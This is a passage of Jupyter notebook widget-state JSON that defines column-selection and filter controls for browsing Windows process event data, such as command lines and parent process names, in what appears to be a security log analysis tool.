"240c8efe2304410fbf00fab36dacaa92": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "24abd3bcd0b943878646456c006f379e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "24cd9a81835f496aa7097b6502a8818c": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "24f0b291afc94f2d9c1d7ad7e99aa4f0": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "60px" } }, "25b1e0fc10ca44b2ac75941c3c5f90f4": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_7af569788ca7405883d02f1967fa0ecd", "style": "IPY_MODEL_d4533ae3647e4d098cc51eb6a2127db3", "value": "Enter multiple values separated by commas. Strings do not need quotes." } }, "263cb71d2dab4c549c1f7cfd0e1ab996": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "200px" } }, "28d31e801c624bac96c38ebdc8bde877": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "28e2f8aecc1a42f6b2be8c80e32b5450": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "290bdd1228a745eea5f8cef44549b607": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "29818462d318453e942833765601e387": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "⇽ Remove All", "layout": "IPY_MODEL_8d41729e1a0044b5bdfd0914a98a1665", "style": "IPY_MODEL_9a8a82586b6e41ab87cce717b8330065" } }, "29c61bd1b3764cac8949a397cc11ca0c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_2f128316da7d4133b7614ae37b14a71c", "IPY_MODEL_de5a721dfab24746bca9695edc80f9af", "IPY_MODEL_c66f8bee2513480cb6bbf9ccd65813fa", "IPY_MODEL_f42540ef834c46588330bc919ebe7a37" ], "layout": "IPY_MODEL_ede5f65334bb4b3f8c03c55d590663ee" } }, "2b69ea13a55049a98b892d9cb690ba48": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "2b8f523976c5435097fc758367a29155": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "2e774ca4b671491f8b2c6815725d2197": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "⇽ Remove", "layout": "IPY_MODEL_765363db870c4e5fbc4aee6d8fa11a6e", "style": "IPY_MODEL_e764c684b29b4baeae8f3d7e4070d57c" } }, "2e7cce877ce84b2d952c845e924acf80": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "2e8cf80eb31f4d838fb45ff75ceadd24": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "2ef88d07a68f4b78a1370c09b9f17cc3": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "150px", "width": "300px" } }, "2f128316da7d4133b7614ae37b14a71c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add All ⇾", "layout": "IPY_MODEL_efb5f03aa620490a90d8ff5f537efb4c", "style": "IPY_MODEL_456a0f75c7a343dfb82324e2656349e5" } }, "315902317a0547f9a8f19c4355197016": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "317f3cbab9a04ec4ba020f7d842c08ff": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "32112c3fe01b47168c8748f434d3839a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_f06eec399f3c4636bd958d097dec7c31", "IPY_MODEL_ccde816cc3e24430892cc22423a2cc8c", "IPY_MODEL_f410bb9feac74bff8c2576f2affec5bd", "IPY_MODEL_b9418b0a4b0f426e82d48c6d431c4b76" ], "layout": "IPY_MODEL_c59f4b4b12ea405aaf0f455b95dcb4b2" } }, "32da2808f3dc48c780007097651ad199": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "3421dbe76372482c9fbad5f3bba4582a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "3461b05d836b4737ac297ec975c7b068": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "500px" } }, "357904b77e634085ab873b108cec56e5": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "3599f0195f74406a9eefc7ea701c5a53": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "35e743cbf37540cf82454eff5130d346": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "35ed7a6a2aae4f8bb322a916730e04d5": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "200px" } }, "364c943a19604eeb9007ab0305a686c6": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "Account", "CommandLine", "Computer", "EventID", "NewProcessId", "NewProcessName", "ParentProcessName", "ProcessId", "SourceComputerId", "SubjectDomainName", "SubjectLogonId", "SubjectUserName", "SubjectUserSid", "TargetLogonId", "TenantId", "TimeCreatedUtc", "TimeGenerated", "TokenElevationType" ], "description": "Selected: ", "index": [], "layout": "IPY_MODEL_6ff46ca9038444fb8984abd8082103fc", "rows": 5, "style": "IPY_MODEL_d769aff3aca54cf0b7e3fe900f6b59cf" } }, "36f954cd65c84630a947477c44dd2441": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "371e0543d3a34af78f8beb98169e5866": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "37423026a07c47bcab9fb40a998ce6e3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "⇽ Remove", "layout": "IPY_MODEL_dbb9c0a587ba49d0966f793675444e26", "style": "IPY_MODEL_ffeb4d532469440bb9baa845061a1bf3" } }, "379a69de1e8c403a9b4245e01a504291": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "37df403e4e3e4e1a80281eff814ee2ea": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "3828cc1ef0af4a358e7206ac8d36c8d2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "Filter:", "layout": "IPY_MODEL_cd7d521ef00c486795f5682f8bdf3551", "style": "IPY_MODEL_44bc20dec7a1474e9da56165c583efbb" } }, "388666284cd2420d82603b3470fb3569": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Delete filter", "layout": "IPY_MODEL_7faa7b2636ff49c081e8d4ceb6f0d5dc", "style": "IPY_MODEL_f859b4a334e14303ab3708553ba044e4" } }, "3b625d23c1724ba9ad2fca444ae41557": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "3c8fd11bf6eb47bf935f8ad83ef84793": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "60px" } }, "3d5cd18b3c704bd5af5b7d7e5fe8c8ef": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_4b4b72cbe9e94236b36123fff4742102", "IPY_MODEL_b098189c53c8460e9a9666d5752d92ef", "IPY_MODEL_1989835689bb409f965c7a52b25af959", "IPY_MODEL_e4ee07ff3b964c7d8f29b74b985769dc" ], "layout": "IPY_MODEL_a1ed7400c5e44de38efb3d26c89a560f" } }, "3e555b4d06c54103a7494ee78d1890f3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "3e5bf9dfbc5e403fbc1f598a84461202": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "description": "Filters", "index": null, "layout": "IPY_MODEL_132d4edf36b448dda4431b86ba240ba0", "style": "IPY_MODEL_56a988762bca49b1a916067527dc99c7" } }, "3ee645fa3a97487e8ce033b176c49dfd": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DropdownModel", "state": { "_options_labels": [ "TenantId", "Account", "EventID", "TimeGenerated", "Computer", "SubjectUserSid", "SubjectUserName", "SubjectDomainName", "SubjectLogonId", "NewProcessId", "NewProcessName", "TokenElevationType", "ProcessId", "CommandLine", "ParentProcessName", "TargetLogonId", "SourceComputerId", "TimeCreatedUtc" ], "index": 0, "layout": "IPY_MODEL_15b94024ea40418dbaa8c53373332424", "style": "IPY_MODEL_9d5c7d739a3a469a85328effd2798798" } }, "3fac7055e539457aae88db9d1b336a88": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "40a1ef478e2940c9ac816f6fe9a930bb": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "41a49335edb540afb5788bafc4b12ee8": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Update filter", "layout": "IPY_MODEL_8f774e952712457980e7629729a12dd6", "style": "IPY_MODEL_dff0190e115d4b2785e7a5fd7b074d8d" } }, "41e832972ce94fd6b272cbcd2e381a24": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "4240f695acbc496489d98ddef8c4b4fa": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "4290b96dad854b4e8ef4d3ef551ebd05": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "429fedb43a7b4c478379bd3a66cb4e5a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_fc40d426613c4c298b80596e4b386a8b", "IPY_MODEL_aa538012bac8400d9af8fc9139f334e8", "IPY_MODEL_364c943a19604eeb9007ab0305a686c6" ], "layout": "IPY_MODEL_cf5e4274010541d8865bc05ddf91e0d2" } }, "44bc20dec7a1474e9da56165c583efbb": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "455a4f5afc00481cbda4e6749f52df45": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "⇽ Remove All", "layout": "IPY_MODEL_791184a6b4e94f2897f8d7fa4f84d4a9", "style": "IPY_MODEL_371e0543d3a34af78f8beb98169e5866" } }, "456a0f75c7a343dfb82324e2656349e5": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "4640975482294d48a0062172a50ad4fe": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "60px" } }, "4720a484b76c4164b5d14b596ac913a8": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "4732461066364353bdec58f67246ac2b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add filter", "layout": "IPY_MODEL_5f3944eaf26044c5bfcb4c62815bf242", "style": "IPY_MODEL_3e555b4d06c54103a7494ee78d1890f3" } }, "48d9e12f7bf74adaa36be69badc166bc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_36f954cd65c84630a947477c44dd2441", "style": "IPY_MODEL_531d46fde7f2414b8ed730e187bdf947", "value": " in " } }, "492e6b74c6fb4883ac8e7f217427b0f2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "CheckboxModel", "state": { "description": "not", "disabled": false, "layout": "IPY_MODEL_4640975482294d48a0062172a50ad4fe", "style": "IPY_MODEL_0468790673594a8daa18a9805bf3db84", "value": false } }, "49926b14baa846ed9ec26bffa8f01557": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "49ec7cbca6094ec6bd95b9d8fc475e19": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Apply columns", "layout": "IPY_MODEL_0ff353fb41fd4ed58826f9effa2b5a18", "style": "IPY_MODEL_99c0dafd7b9d497bb9f1fd7395417065" } }, "4adbd494324149ee87c67f74fb08c17a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "4b4b72cbe9e94236b36123fff4742102": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_0b50cc97034944ca87ec5c6d415ad132", "IPY_MODEL_051ad9f6b3e941e996df3e4b7dd5a3c3" ], "layout": "IPY_MODEL_9f7ea662245444379365dcd2ba059448" } }, "4b4df991eb764acba40c4005635698cc": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "4b5cb16646744994a0591fd8c712a95c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "Account", "CommandLine", "Computer", "EventID", "NewProcessId", "NewProcessName", "ParentProcessName", "ProcessId", "SourceComputerId", "SubjectDomainName", "SubjectLogonId", "SubjectUserName", "SubjectUserSid", "TargetLogonId", "TenantId", "TimeCreatedUtc", "TimeGenerated", "TokenElevationType" ], "description": "Source: ", "index": [], "layout": "IPY_MODEL_e66cc5687c9b491c82606ce504ad107c", "rows": 5, "style": "IPY_MODEL_a49ece9f71ee4341876903064f3561ee" } }, "4c01a47b27504cea84eef56487622669": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "Filter:", "layout": "IPY_MODEL_01e9b5b9e2f948f8b02f10bd0e2d2581", "style": "IPY_MODEL_8c75af75e9ff4248b52541ab1a1b21fe" } }, "4c0ef6df952c417ea2aad07c1cd21b20": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "70%" } }, "4d5f608bec20449094d83db8a84f208b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "4da850c8e7b749f8b99cfc8a9f744214": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "4e297c36b90b4b4fa999fea2f992b72c": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "4fbba2de7b514444af1af3ac79dfa030": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "50d5ff5100bd40b4a05dc32b98c45991": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "AccordionModel", "state": { "_titles": { "0": "Choose columns", "1": "Filter data" }, "children": [ "IPY_MODEL_6e12932cba8a4db38afd4129ecedb2d2", "IPY_MODEL_d8963740d2844d74922276773cd3a13d" ], "layout": "IPY_MODEL_d738de016f5241e085832e853683bca7", "selected_index": null } }, "51133fd46f5b40a9b4846a7375020529": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "Filter:", "layout": "IPY_MODEL_6d09eafd05c34f6194cf64a3c85902d6", "style": "IPY_MODEL_8ce0e47b9a7a4fe1a02502625c611010" } }, "531d46fde7f2414b8ed730e187bdf947": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "53edfbdbf8094668887e7fa7aca1277d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_830597ddd37d413aa19ce107456ec8e3", "IPY_MODEL_ded1344fbb1d46aba120fa799197296e", "IPY_MODEL_5ca4bc3a2cc545d1baf13cb08147b5ae", "IPY_MODEL_b3b63660a07b4c618485f25aaded3a10" ], "layout": "IPY_MODEL_40a1ef478e2940c9ac816f6fe9a930bb" } }, "5498363e65024a7199085e67ac5862ac": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_c70f6096a87940608ecb1abad231842b", "style": "IPY_MODEL_67662ed427e8407689f108ca7ab46553", "value": " in " } }, "5518aabbc36d4a9ab670e196d89a79eb": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "56a988762bca49b1a916067527dc99c7": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "57fc931f1f6745b5b44d7360f6ee88f7": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "585ae97c11be4e9294df3faa0109e2e1": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "_options_labels": [ "ParentProcessName contains 'cmd'", "CommandLine contains 'script'" ], "description": "Filters", "index": 0, "layout": "IPY_MODEL_3461b05d836b4737ac297ec975c7b068", "style": "IPY_MODEL_290bdd1228a745eea5f8cef44549b607" } }, "58e88d32feee440798b623eab2c6e1ca": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "5a16de0528ff4f048b0f42acd30ac235": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_5d609325357946cd9eff5c6c6a932934", "style": "IPY_MODEL_5c59820ba79f41c9aedd44c44da6717a" } }, "5c4e8097bca54b779cee09f7e6ad4084": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "5c59820ba79f41c9aedd44c44da6717a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "5ca4bc3a2cc545d1baf13cb08147b5ae": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DropdownModel", "state": { "_options_labels": [ "==", ">", "<", ">=", "<=", "in", "between", "query" ], "index": 7, "layout": "IPY_MODEL_1df078ffdbf340d2b70640a33b365c62", "style": "IPY_MODEL_239c5c522a0c491f8ec97c7b46a3ca73" } }, "5d1d50dcb2994f94b1f68091db52194b": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "5d609325357946cd9eff5c6c6a932934": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "99%" } }, "5da7687c0c814881875c71408ab15f57": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "5dc40bae85f843089ee9cd9c23ba55a1": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add filter", "layout": "IPY_MODEL_112807c16f29483db116dcc6531c553a", "style": "IPY_MODEL_cf88b195506e465585b9abaf1f824f41" } }, "5e4a9ab5687b4c44b42eae3e5cd53193": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_b22abd90c5ea4903b6cc5d3d2a84d802", "IPY_MODEL_08852b76afe74c028723879733117fdd" ], "layout": "IPY_MODEL_1a44a4cf9c8b4dc382a8d021466c0d18" } }, "5ea3e5fb5bfe4f5fb9004a659d5dc3bb": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "5ecb8ec617804e2a9b295945d98f680d": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "5ecf764ff60340b793e302414cd0a417": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "5edf1b17f727492681224d545bbdc9da": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "5f3944eaf26044c5bfcb4c62815bf242": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "601cfccce4314248aecf44c3d43382fc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "⇽ Remove All", "layout": "IPY_MODEL_5518aabbc36d4a9ab670e196d89a79eb", "style": "IPY_MODEL_62303da35e734238aa9610d29dff8b25" } }, "604b1293e471432cb5262e736892b57d": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "6194e41b56e9470090e9ade5fb082686": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "62303da35e734238aa9610d29dff8b25": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "64a381695b2548c68a01e87ef0162557": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_cd0cbccc70804b6a95707356c1292568", "IPY_MODEL_ad3662e275b14795b7a09ffecdf1b070" ], "layout": "IPY_MODEL_4fbba2de7b514444af1af3ac79dfa030" } }, "6505786c126f496188cabc0e0cc7fbd1": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "650a6653093a4b51b357c79f7b3d5ba5": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_585ae97c11be4e9294df3faa0109e2e1", "IPY_MODEL_64a381695b2548c68a01e87ef0162557" ], "layout": "IPY_MODEL_f88331d7df0c45e4b15afc2261ba564e" } }, "66ae56d26ca74fb4ad7ee2d96fe02815": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "66d6f1f9aacf406aa8e5222b4e95e897": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "66d7edd125c144388025e41cab4aa0ac": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "67662ed427e8407689f108ca7ab46553": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "676fdbb9a65043568fd3c819d1cf7a3d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "67c2936988ff41e08c935ba701768ea6": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "67f4128b4e4e45a7991b0d4bf23a9b2a": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "67fe3434a66d4846b4aa6f8e77545022": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_1109323aa29e47dbac0b7a6a6d5beebe", "IPY_MODEL_e8fa63f35d3f43c6b516ef58e8535d31" ], "layout": "IPY_MODEL_95d79867267445e1810542e2538a7a89" } }, "69b8bf72d11e4859b7a35c099b850558": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DropdownModel", "state": { "_options_labels": [ "==", "contains", "matches", "in", "between", "query" ], "index": 0, "layout": "IPY_MODEL_725654808c214705a72fba6e841d48bf", "style": "IPY_MODEL_dfccb5d4237446459cc509270d55ba35" } }, "6a2925f0bd3e47dfb77c59fc9daf38e1": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "6b033d15e10549ca90024f3f548d9c90": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_25b1e0fc10ca44b2ac75941c3c5f90f4", "IPY_MODEL_32112c3fe01b47168c8748f434d3839a" ], "layout": "IPY_MODEL_c3547c84759043b8aa461cb754754fd9" } }, "6c1f75ab44ac489a9fc4fdc265de7c60": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "6d09eafd05c34f6194cf64a3c85902d6": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "6db387e0ce73474ebbc9b81d9a6b65cc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_604b1293e471432cb5262e736892b57d", "style": "IPY_MODEL_06248439df564c268fb7ad0e58f35808", "value": "Current filters" } }, "6df397a9bfef4fff85d638ea7ed64ba3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "6e12932cba8a4db38afd4129ecedb2d2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_e6e59154a9384db382274533a2321481", "IPY_MODEL_ab22d75a7f3b42b8a4a778225fa2fb9d" ], "layout": "IPY_MODEL_b31376a38ee6457b89cc140165c1623f" } }, "6ec04674a0df4341a4b6a4304b7d9a43": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "6ff46ca9038444fb8984abd8082103fc": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "200px", "width": "40%" } }, "700662f2d6474ed083f4288403c33847": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "border": "solid gray 1px", "margin": "1pt", "padding": "5pt", "width": "80%" } }, "7059d69c5ec4412aa91247741509c2be": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "Filter value", "layout": "IPY_MODEL_b620d8158c6a4be4ae42c239258a8cbe", "style": "IPY_MODEL_16d5d38a9798409d823cbb317fbe14e9" } }, "712734768b4d4aec99269b92b19a93f8": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "725654808c214705a72fba6e841d48bf": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "100px" } }, "73074bebabbf43e69ea59c5da5dbf945": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "150px", "width": "300px" } }, "73ace9de6deb47e08240f8355a93cbf0": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "Account", "CommandLine", "Computer", "EventID", "NewProcessId", "NewProcessName", "ParentProcessName", "ProcessId", "SourceComputerId", "SubjectDomainName", "SubjectLogonId", "SubjectUserName", "SubjectUserSid", "TargetLogonId", "TenantId", "TimeCreatedUtc", "TimeGenerated", "TokenElevationType" ], "description": "Source: ", "index": [], "layout": "IPY_MODEL_f54de8691386447697961c9c868f9a29", "rows": 5, "style": "IPY_MODEL_5da7687c0c814881875c71408ab15f57" } }, "73d4b2b7a2004f4dab1647763895ad11": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "74c7f4c498954e67a0eee60214170b96": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "74fa9c71b0ec481a922dc864621ad54a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add All ⇾", "layout": "IPY_MODEL_712734768b4d4aec99269b92b19a93f8", "style": "IPY_MODEL_24abd3bcd0b943878646456c006f379e" } }, 